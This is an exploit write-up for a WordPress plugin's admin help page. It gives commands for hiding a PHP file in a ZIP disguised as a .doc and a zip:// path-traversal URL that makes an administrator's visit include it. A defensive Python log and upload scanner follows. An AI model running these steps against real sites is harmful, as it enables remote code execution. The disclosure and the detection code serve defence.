## https://sploitus.com/exploit?id=WPEX-ID:E777784F-5BA0-4966-BE27-E0A0CBBFE056
1) Create a malicious PHP script
$ echo '<?php phpinfo();' > shell.php

2) Add it to a fake .doc file, which will actually be a zip file
$ zip malicious.doc shell.php

3) While logged-in as an Author, upload the "doc" file via WP's media gallery.

4) Have an administrator visit the following URL:

https://example.com/wp-admin/admin.php?page=c4wp-admin-help&tab=zip://../wp-content/uploads/2022/06/malicious.doc%23shell
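
A defender's view of the steps above, as an added example that is not part of the original write-up or the plugin's own code: it flags c4wp-admin-help requests whose tab parameter carries a stream wrapper or path traversal, and .doc uploads that are really ZIP archives holding PHP files. The function names, the wrapper list, the combined log format and the sample data are assumptions constructed for illustration.

```python
import io
import zipfile
from urllib.parse import urlsplit, parse_qs

# PHP stream wrappers that have no business inside a tab name (assumed list).
WRAPPERS = ("zip://", "phar://", "php://", "data://", "file://", "expect://", "glob://")
PHP_EXTS = (".php", ".phtml", ".phar")

def suspicious_tab(url):
    """Return the decoded `tab` value if it holds a wrapper or traversal, else None."""
    qs = parse_qs(urlsplit(url).query)  # parse_qs also decodes %23 to '#'
    if "c4wp-admin-help" not in qs.get("page", []):
        return None
    for tab in qs.get("tab", []):
        low = tab.lower()
        if "../" in low or any(w in low for w in WRAPPERS):
            return tab
    return None

def scan_access_log(lines):
    """Yield (client, tab) for each flagged request in combined-format log lines."""
    for line in lines:
        parts = line.split('"')
        target = parts[1].split()[1:2] if len(parts) > 1 else []
        hit = suspicious_tab(target[0]) if target else None
        if hit:
            yield line.split()[0], hit

def php_in_fake_doc(filename, data):
    """Return PHP member names when a .doc upload is really a ZIP archive."""
    # A legacy .doc is an OLE2 compound file, so one that parses as ZIP is a mismatch.
    if not filename.lower().endswith(".doc") or not zipfile.is_zipfile(io.BytesIO(data)):
        return []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith(PHP_EXTS)]

# Constructed sample data (not from a real server; "faq" is a made-up benign tab).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jun/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=c4wp-admin-help&tab=faq HTTP/1.1" 200 4312',
    '203.0.113.9 - - [10/Jun/2022:10:02:17 +0000] "GET /wp-admin/admin.php?page=c4wp-admin-help&tab=zip://../wp-content/uploads/2022/06/malicious.doc%23shell HTTP/1.1" 200 90211',
]

def sample_fake_doc():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("shell.php", "<?php phpinfo();")
    return buf.getvalue()
```

Run scan_access_log over the web server's access log and php_in_fake_doc over files under wp-content/uploads; a hit from either is worth correlating with the other.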